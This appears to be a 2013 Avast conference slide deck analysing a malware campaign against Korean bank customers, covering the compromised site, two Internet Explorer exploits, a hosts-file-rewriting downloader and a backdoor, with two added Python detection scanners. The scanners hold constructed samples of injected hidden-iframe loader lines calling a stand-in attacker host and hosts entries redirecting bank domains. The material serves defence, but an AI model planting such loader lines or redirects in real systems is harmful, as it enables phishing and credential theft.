Korean Banks Under Pressure

Jaromír Hořejší ([email protected])
Jan Širmer ([email protected])
Avast, www.avast.com

AVAR 2013, Chennai

Agenda

• Origin of infection
• Infection stages
• Consequences on a compromised machine
• Origin of attackers
• Summary
• Questions

Origin of infection

• March 2013
• Compromised legitimate website
• Korean SPC website as the source of infection
• Works as a bridge between victims and the attackers' website

The first stage of infection

• Content of the compromised SPC website
• Source code of common1.js
• Source code of Screen.js contains a link to the attackers' site
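An added example, not code from the deck or from Avast: a small Python scanner of the kind used when triaging a compromised site such as the one above. It pulls every src/href URL out of a script file and reports those pointing off the site's own domain, marking elements that are zero-sized or styled display:none, which is the usual shape of an injected loader. The script sample, the site domain spc.example and the attacker host example-attacker.invalid are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape of a compromised site's helper script:
# genuine page code followed by appended document.write() calls that load
# content from a hypothetical attacker host (example-attacker.invalid).
SAMPLE_SCREEN_JS = r"""
function fitWindow(w, h) { window.resizeTo(w, h); }
var logo = '<img src="/images/logo.gif">';
document.write('<iframe src="http://example-attacker.invalid/cc.html" width=0 height=0 style="display:none"></iframe>');
document.write("<script src='http://example-attacker.invalid/1.html'></script>");
"""

# src= / href= attribute values, allowing a backslash-escaped quote inside a JS string
REF_RE = re.compile(r"""(?:src|href)\s*=\s*\\?["']?((?:https?:)?//[^"'\\\s>]+)""", re.I)
# attributes that make the injected element invisible to the visitor
HIDDEN_RE = re.compile(
    r"""width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.I,
)


def find_external_refs(js_text, site_domain):
    """Return [(url, hidden)] for every src/href in the script that points
    off the site's own domain (site_domain and its subdomains are trusted).
    hidden=True when the same line also carries a zero-size or display:none
    attribute, i.e. the element is meant to be invisible to the visitor."""
    site_domain = site_domain.lower()
    findings = []
    for line in js_text.splitlines():
        for m in REF_RE.finditer(line):
            url = m.group(1)
            # protocol-relative URLs (//host/path) need a scheme before urlparse sees a host
            host = (urlparse(url if url.startswith("http") else "http:" + url).hostname or "").lower()
            if host == site_domain or host.endswith("." + site_domain):
                continue
            findings.append((url, bool(HIDDEN_RE.search(line))))
    return findings


if __name__ == "__main__":
    for url, hidden in find_external_refs(SAMPLE_SCREEN_JS, "spc.example"):
        print(("HIDDEN " if hidden else "       ") + url)
```

Run it against every .js file served by the site; an off-site reference inside a script that has no business loading third-party content is the lead to follow, and a hidden iframe or script tag is the typical hand-off to the exploit page.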

Attack website source code

• Contains 3 scripts
• One counter for infection statistics
• Two scripts with exploits to compromise the visitor's computer

The first exploit

• 1.html– CVE-2010-0806– Use-after-free vulnerability in the Peer Objects

component– Works in IE6, 6 SP1 and IE7

Identification of the first exploit

Shellcode executed by the first exploit
• No encryption

The second exploit

• Cc.html
– CVE-2012-1889
– Causes Microsoft XML Core Services to access an uninitialized memory location; patched by MS12-043 in July 2012
– Works in IE6 and IE7, and can be extended to work in IE8 and IE9

Identification of the second exploit

Shellcode executed by the second exploit
• With encryption
• Decrypted shellcode

The second stage of infection

• A small downloader (15 KB) written in Visual Basic
• Performs several tasks on the compromised computer
– Checks the internet connection by downloading a file from a Korean search engine (http://static.naver.net/w9/blank.gif)
– Downloads a hosts file that redirects several URL addresses (the resolver consults the hosts file before DNS, so the listed names resolve to the attackers' server without any network-level tampering)
– Increases the statistics counter
– Makes itself persistent by modifying the Run registry key
– Downloads a backdoor file and executes it
– Drops and executes a batch file which schedules the second-stage downloader to run at a 30-minute interval
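The hosts-file step above is the one that later turns a bank's address into the attackers' page, so it deserves a concrete check. The following Python is an added example, not code from the deck or from Avast: it parses a Windows-style hosts file and flags (a) any watchlisted bank domain pinned to an address, (b) any name pinned to a non-local address, and (c) several unrelated domains sharing one address, the signature of a redirect list. The sample hosts content, the bank-*.example names and the 198.51.100.23 address are constructed for this example.

```python
import ipaddress
from collections import defaultdict

# Constructed sample hosts file: the stock Windows header followed by the kind
# of block the second-stage downloader appends (hypothetical bank domains,
# attacker address taken from a documentation range).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   www.bank-a.example
198.51.100.23   bank-a.example
198.51.100.23   www.bank-b.example
198.51.100.23   online.bank-c.example
"""

# Names that legitimately map to a loopback address in a stock hosts file.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def is_local(ip):
    """Loopback, link-local, unspecified (0.0.0.0 sinkholes) or private ranges:
    the only addresses a hosts file normally points at."""
    return (ip.is_loopback or ip.is_link_local or ip.is_unspecified
            or any(ip in net for net in PRIVATE_NETS))


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for each mapping; skip comments, blanks and junk."""
    for n, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield n, ip, name.lower()


def registrable(name):
    """Crude registrable domain (last two labels), enough to group hostnames."""
    return ".".join(name.split(".")[-2:])


def suspicious_entries(text, watchlist=()):
    """Return findings as (line_no, ip, hostname, reason); line_no 0 marks an
    aggregate finding over several lines."""
    wl = {w.lower() for w in watchlist}
    findings = []
    names_by_ip = defaultdict(set)
    for n, ip, name in parse_hosts(text):
        if name in LOCAL_NAMES and ip.is_loopback:
            continue  # stock entries
        names_by_ip[ip].add(name)
        if name in wl or any(name.endswith("." + w) for w in wl):
            findings.append((n, str(ip), name, "watchlisted domain pinned in hosts file"))
        if not is_local(ip):
            findings.append((n, str(ip), name, "pinned to a non-local address"))
    # Many unrelated domains on one external address is the redirect-list signature.
    for ip, names in names_by_ip.items():
        domains = {registrable(x) for x in names}
        if len(domains) >= 3 and not is_local(ip):
            findings.append((0, str(ip), ",".join(sorted(names)),
                             f"{len(domains)} unrelated domains share one address"))
    return findings


if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS, watchlist=["bank-a.example"]):
        print(finding)
```

Feed it the contents of %SystemRoot%\System32\drivers\etc\hosts from a suspect machine; a watchlist of the bank domains your users actually visit makes the first signal precise, and the other two catch redirect lists for domains you did not think to list.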

The third stage of infection

• Backdoor, 1.3 MB, written in Delphi
• Protected by Safengine
• Injects itself into iexplorer.exe
• Initiates communication via a custom communication protocol
• Remote control of the compromised system
• Contains many built-in functions

Consequences on the compromised machine

• Kookmin Bank's website on the compromised computer
• Original and modified website
• Victim asked for personal credentials

Origin of the attackers

• Probably Chinese-speaking individuals

Summary

• Growing number of bank frauds
• Using compromised legitimate websites
• Using more than one exploit
• Combination of fraud attack and remote control
• Probably known origin of attackers

Questions & Answers

• Questions?

Thank you

Jan Sirmer ([email protected]), Virus Analyst & Researcher
Jaromir Horejsi ([email protected]), Virus Analyst & Researcher